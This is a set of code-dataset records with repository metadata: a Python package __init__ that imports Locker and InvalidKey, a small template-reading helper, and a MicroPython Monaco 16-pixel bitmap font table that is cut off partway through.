Coal0/Locker
|
ac2b2052df56350bcd0af3aaa60ef96de19257eb
|
[
"MIT"
] | null | null | null |
locker/__init__.py
|
Coal0/Locker
|
ac2b2052df56350bcd0af3aaa60ef96de19257eb
|
[
"MIT"
] | null | null | null |
from .locker import Locker
from .locker import InvalidKey
| 19.333333
| 30
| 0.827586
| 8
| 58
| 6
| 0.5
| 0.416667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 58
| 2
| 31
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cf76ef6118318fa5292cf9133490605b6fea26f3
| 137
|
py
|
Python
|
example/views/helpers.py
|
aholyoke/grasshopper
|
b9e11ac3aafdb6e2a61cc8a74ca67e36b690da69
|
[
"BSD-3-Clause"
] | null | null | null |
example/views/helpers.py
|
aholyoke/grasshopper
|
b9e11ac3aafdb6e2a61cc8a74ca67e36b690da69
|
[
"BSD-3-Clause"
] | null | null | null |
example/views/helpers.py
|
aholyoke/grasshopper
|
b9e11ac3aafdb6e2a61cc8a74ca67e36b690da69
|
[
"BSD-3-Clause"
] | null | null | null |
def read_template(template_dir, template_name):
    """Return the full text of the template file template_dir/template_name."""
    template_path = f"{template_dir}/{template_name}"
    with open(template_path) as template_file:
        return template_file.read()
| 34.25
| 64
| 0.686131
| 19
| 137
| 4.684211
| 0.578947
| 0.247191
| 0.426966
| 0.516854
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160584
| 137
| 3
| 65
| 45.666667
| 0.773913
| 0
| 0
| 0
| 0
| 0
| 0.036496
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d84a871eefb08bf6d94055041e3d080ec2d9dd8f
| 17,707
|
py
|
Python
|
frozen/monaco16.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 45
|
2018-04-02T22:24:47.000Z
|
2022-03-27T14:34:06.000Z
|
frozen_modules/fonts/monaco16.py
|
lemariva/uPyEINK
|
8778239b9dfe32b0d4535db0045a7feb1c131d5c
|
[
"Apache-2.0"
] | 2
|
2018-09-19T09:39:20.000Z
|
2019-05-23T09:56:29.000Z
|
frozen/monaco16.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 16
|
2018-04-08T21:34:28.000Z
|
2022-03-18T16:00:38.000Z
|
# Glyph cell size for this bitmap font: each character occupies a
# width x height pixel cell. `const()` is presumably MicroPython's
# compile-time constant helper — confirm `from micropython import const`
# appears earlier in the file.
width = const(10)
height = const(16)
data = [
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x00 (0)
0x00,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x01 (1)
0x00,0x00,0x36,0x00,0x36,0x00,0x36,0x00,0x36,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x02 (2)
0x00,0x00,0x11,0x00,0x11,0x00,0x11,0x00,0xff,0x80,0x22,0x00,0x22,0x00,0x22,0x00,0x22,0x00,0xff,0x80,0x44,0x00,0x44,0x00,0x44,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x03 (3)
0x08,0x00,0x3e,0x00,0x68,0x00,0x48,0x00,0x48,0x00,0x38,0x00,0x18,0x00,0x0e,0x00,0x0b,0x00,0x09,0x00,0x09,0x00,0x4a,0x00,0x3c,0x00,0x08,0x00,0x00,0x00,0x00,0x00, # Character 0x04 (4)
0x00,0x00,0x70,0x40,0x88,0x80,0x88,0x80,0x89,0x00,0x8a,0x00,0x74,0x00,0x0b,0x80,0x0c,0x40,0x14,0x40,0x24,0x40,0x44,0x40,0x83,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x05 (5)
0x00,0x00,0x38,0x00,0x44,0x00,0x44,0x00,0x4c,0x00,0x78,0x00,0x30,0x00,0x71,0x00,0x89,0x00,0x85,0x00,0x83,0x00,0x87,0x00,0x7c,0xc0,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x06 (6)
0x00,0x00,0x0e,0x00,0x0e,0x00,0x0e,0x00,0x04,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x07 (7)
0x03,0x00,0x0c,0x00,0x10,0x00,0x30,0x00,0x20,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x20,0x00,0x30,0x00,0x10,0x00,0x0c,0x00,0x03,0x00, # Character 0x08 (8)
0x60,0x00,0x18,0x00,0x04,0x00,0x06,0x00,0x02,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x02,0x00,0x06,0x00,0x04,0x00,0x18,0x00,0x60,0x00, # Character 0x09 (9)
0x08,0x00,0x08,0x00,0x6b,0x00,0x1c,0x00,0x1c,0x00,0x6b,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0a (10)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x7f,0xc0,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0b (11)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0x1c,0x00,0x1c,0x00,0x04,0x00,0x08,0x00,0x10,0x00, # Character 0x0c (12)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0d (13)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x1c,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0e (14)
0x00,0x80,0x00,0x80,0x01,0x00,0x02,0x00,0x02,0x00,0x04,0x00,0x04,0x00,0x08,0x00,0x10,0x00,0x10,0x00,0x20,0x00,0x40,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0f (15)
0x00,0x00,0x1c,0x00,0x23,0x00,0x41,0x80,0x41,0x80,0x42,0x80,0x44,0x80,0x48,0x80,0x48,0x80,0x50,0x80,0x60,0x80,0x21,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x10 (16)
0x00,0x00,0x18,0x00,0x28,0x00,0x48,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x11 (17)
0x00,0x00,0x3f,0x00,0x40,0x80,0x00,0x80,0x00,0x80,0x01,0x00,0x06,0x00,0x0c,0x00,0x10,0x00,0x20,0x00,0x60,0x00,0x40,0x00,0x7f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x12 (18)
0x00,0x00,0x3c,0x00,0x43,0x00,0x01,0x00,0x01,0x00,0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x80,0x00,0x80,0x00,0x80,0x41,0x00,0x3e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x13 (19)
0x00,0x00,0x02,0x00,0x06,0x00,0x0a,0x00,0x12,0x00,0x12,0x00,0x22,0x00,0x42,0x00,0x82,0x00,0xff,0xc0,0x02,0x00,0x02,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x14 (20)
0x00,0x00,0x7f,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x7c,0x00,0x03,0x00,0x00,0x80,0x00,0x80,0x00,0x80,0x00,0x80,0x41,0x00,0x3e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x15 (21)
0x00,0x00,0x1f,0x00,0x20,0x00,0x40,0x00,0xc0,0x00,0x80,0x00,0x9e,0x00,0xa1,0x00,0xc0,0x80,0xc0,0x80,0x40,0x80,0x61,0x00,0x3e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x16 (22)
0x00,0x00,0x7f,0x80,0x00,0x80,0x01,0x00,0x03,0x00,0x04,0x00,0x04,0x00,0x08,0x00,0x08,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x17 (23)
0x00,0x00,0x1f,0x00,0x61,0x80,0x40,0x80,0x40,0x80,0x21,0x00,0x1e,0x00,0x33,0x00,0x61,0x80,0x40,0x80,0x40,0x80,0x61,0x80,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x18 (24)
0x00,0x00,0x3e,0x00,0x43,0x00,0x81,0x00,0x81,0x80,0x81,0x80,0x42,0x80,0x3c,0x80,0x00,0x80,0x01,0x80,0x01,0x00,0x02,0x00,0x7c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x19 (25)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x1c,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x1c,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1a (26)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x1c,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0x1c,0x00,0x1c,0x00,0x04,0x00,0x08,0x00,0x10,0x00, # Character 0x1b (27)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x01,0x80,0x06,0x00,0x18,0x00,0x60,0x00,0x18,0x00,0x06,0x00,0x01,0x80,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1c (28)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x80,0x00,0x00,0x00,0x00,0xff,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1d (29)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x30,0x00,0x0c,0x00,0x03,0x00,0x00,0xc0,0x03,0x00,0x0c,0x00,0x30,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1e (30)
0x00,0x00,0x3f,0x00,0x00,0x80,0x00,0x80,0x01,0x80,0x03,0x00,0x04,0x00,0x08,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1f (31)
0x1e,0x00,0x21,0x00,0x40,0x80,0x9f,0x40,0xa1,0x40,0xa1,0x40,0xa1,0x40,0xa1,0x40,0x9f,0x80,0x80,0x00,0x40,0x00,0x22,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x20 (32)
0x00,0x00,0x08,0x00,0x1c,0x00,0x14,0x00,0x14,0x00,0x32,0x00,0x22,0x00,0x22,0x00,0x61,0x00,0x7f,0x00,0x41,0x00,0xc1,0x80,0x80,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x21 (33)
0x00,0x00,0x7f,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x7f,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x22 (34)
0x00,0x00,0x1f,0x00,0x20,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x20,0x00,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x23 (35)
0x00,0x00,0x7e,0x00,0x41,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x41,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x24 (36)
0x00,0x00,0x3f,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x25 (37)
0x00,0x00,0x3f,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x26 (38)
0x00,0x00,0x1f,0x80,0x20,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x41,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x20,0x80,0x1f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x27 (39)
0x00,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x7f,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x28 (40)
0x00,0x00,0x7f,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x29 (41)
0x00,0x00,0x1f,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x41,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2a (42)
0x00,0x00,0x41,0x00,0x42,0x00,0x44,0x00,0x48,0x00,0x50,0x00,0x60,0x00,0x50,0x00,0x48,0x00,0x44,0x00,0x42,0x00,0x41,0x00,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2b (43)
0x00,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2c (44)
0x00,0x00,0x41,0x00,0x63,0x00,0x63,0x00,0x63,0x00,0x55,0x00,0x55,0x00,0x55,0x00,0x4d,0x00,0x49,0x00,0x49,0x00,0x41,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2d (45)
0x00,0x00,0x40,0x80,0x60,0x80,0x60,0x80,0x50,0x80,0x50,0x80,0x48,0x80,0x44,0x80,0x44,0x80,0x42,0x80,0x43,0x80,0x41,0x80,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2e (46)
0x00,0x00,0x1e,0x00,0x21,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x21,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2f (47)
0x00,0x00,0x7f,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x41,0x00,0x7e,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x30 (48)
0x00,0x00,0x1e,0x00,0x21,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x21,0x00,0x1e,0x00,0x04,0x00,0x04,0x00,0x03,0xc0, # Character 0x31 (49)
0x00,0x00,0x7e,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x42,0x00,0x7c,0x00,0x44,0x00,0x42,0x00,0x41,0x00,0x41,0x00,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x32 (50)
0x00,0x00,0x1f,0x00,0x20,0x00,0x40,0x00,0x40,0x00,0x60,0x00,0x30,0x00,0x0c,0x00,0x03,0x00,0x00,0x80,0x00,0x80,0x01,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x33 (51)
0x00,0x00,0xff,0x80,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x34 (52)
0x00,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x35 (53)
0x00,0x00,0x80,0x80,0xc0,0x80,0x41,0x00,0x41,0x00,0x63,0x00,0x22,0x00,0x22,0x00,0x36,0x00,0x14,0x00,0x14,0x00,0x1c,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x36 (54)
0x00,0x00,0x88,0x80,0x88,0x80,0x88,0x80,0x55,0x00,0x55,0x00,0x55,0x00,0x55,0x00,0x55,0x00,0x77,0x00,0x63,0x00,0x22,0x00,0x22,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x37 (55)
0x00,0x00,0x21,0x00,0x22,0x00,0x12,0x00,0x14,0x00,0x0c,0x00,0x08,0x00,0x0c,0x00,0x14,0x00,0x22,0x00,0x22,0x00,0x41,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x38 (56)
0x00,0x00,0x40,0x40,0x20,0x80,0x20,0x80,0x11,0x00,0x0a,0x00,0x0a,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x39 (57)
0x00,0x00,0x7f,0x80,0x00,0x80,0x01,0x00,0x02,0x00,0x02,0x00,0x04,0x00,0x08,0x00,0x10,0x00,0x10,0x00,0x20,0x00,0x40,0x00,0x7f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x3a (58)
0x3f,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x00, # Character 0x3b (59)
0x20,0x00,0x20,0x00,0x10,0x00,0x10,0x00,0x08,0x00,0x04,0x00,0x04,0x00,0x02,0x00,0x02,0x00,0x01,0x00,0x01,0x00,0x00,0x80,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x3c (60)
0xfc,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0xfc,0x00, # Character 0x3d (61)
0x00,0x00,0x00,0x00,0x0c,0x00,0x0c,0x00,0x12,0x00,0x12,0x00,0x21,0x00,0x21,0x00,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x3e (62)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x80,0x00,0x00,0x00,0x00, # Character 0x3f (63)
0x08,0x00,0x04,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x40 (64)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1f,0x00,0x21,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x43,0x00,0x3d,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x41 (65)
0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x5e,0x00,0x61,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x42,0x00,0x7c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x42 (66)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x00,0x21,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x20,0x00,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x43 (67)
0x00,0x80,0x00,0x80,0x00,0x80,0x00,0x80,0x0f,0x80,0x10,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x21,0x80,0x1e,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x44 (68)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x00,0x21,0x00,0x41,0x00,0x41,0x00,0x7f,0x00,0x40,0x00,0x40,0x00,0x21,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x45 (69)
0x03,0xc0,0x04,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x7f,0x80,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x46 (70)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0f,0x80,0x10,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x21,0x80,0x1e,0x80,0x00,0x80,0x21,0x00,0x1e,0x00, # Character 0x47 (71)
0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x5e,0x00,0x61,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x48 (72)
0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x49 (73)
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1f,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x02,0x00,0x3c,0x00, # Character 0x4a (74)
0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x21,0x00,0x22,0x00,0x24,0x00,0x28,0x00,0x30,0x00,0x28,0x00,0x24,0x00,0x22,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4b (75)
0x70,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4c (76)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb3,0x00,0xcc,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4d (77)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5e,0x00,0x61,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4e (78)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x22,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x22,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4f (79)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5e,0x00,0x61,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x42,0x00,0x7c,0x00,0x40,0x00,0x40,0x00,0x40,0x00, # Character 0x50 (80)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0f,0x80,0x10,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x21,0x80,0x1e,0x80,0x00,0x80,0x00,0x80,0x00,0x80, # Character 0x51 (81)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2f,0x80,0x30,0x80,0x20,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x52 (82)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3c,0x00,0x42,0x00,0x40,0x00,0x20,0x00,0x1c,0x00,0x02,0x00,0x01,0x00,0x41,0x00,0x3e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x53 (83)
0x00,0x00,0x00,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x3f,0x80,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x07,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x54 (84)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x21,0x80,0x1e,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x55 (85)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x40,0x40,0x40,0x20,0x80,0x20,0x80,0x11,0x00,0x11,0x00,0x0a,0x00,0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x56 (86)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x88,0x80,0x88,0x80,0x94,0x80,0x55,0x00,0x55,0x00,0x55,0x00,0x55,0x00,0x22,0x00,0x22,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x57 (87)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x41,0x00,0x22,0x00,0x14,0x00,0x08,0x00,0x08,0x00,0x14,0x00,0x22,0x00,0x22,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x58 (88)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x41,0x00,0x41,0x00,0x21,0x00,0x22,0x00,0x12,0x00,0x14,0x00,0x0c,0x00,0x0c,0x00,0x08,0x00,0x08,0x00,0x10,0x00,0xe0,0x00, # Character 0x59 (89)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x80,0x01,0x80,0x03,0x00,0x06,0x00,0x0c,0x00,0x18,0x00,0x30,0x00,0x60,0x00,0x7f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x5a (90)
0x07,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x30,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x07,0x00, # Character 0x5b (91)
0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x5c (92)
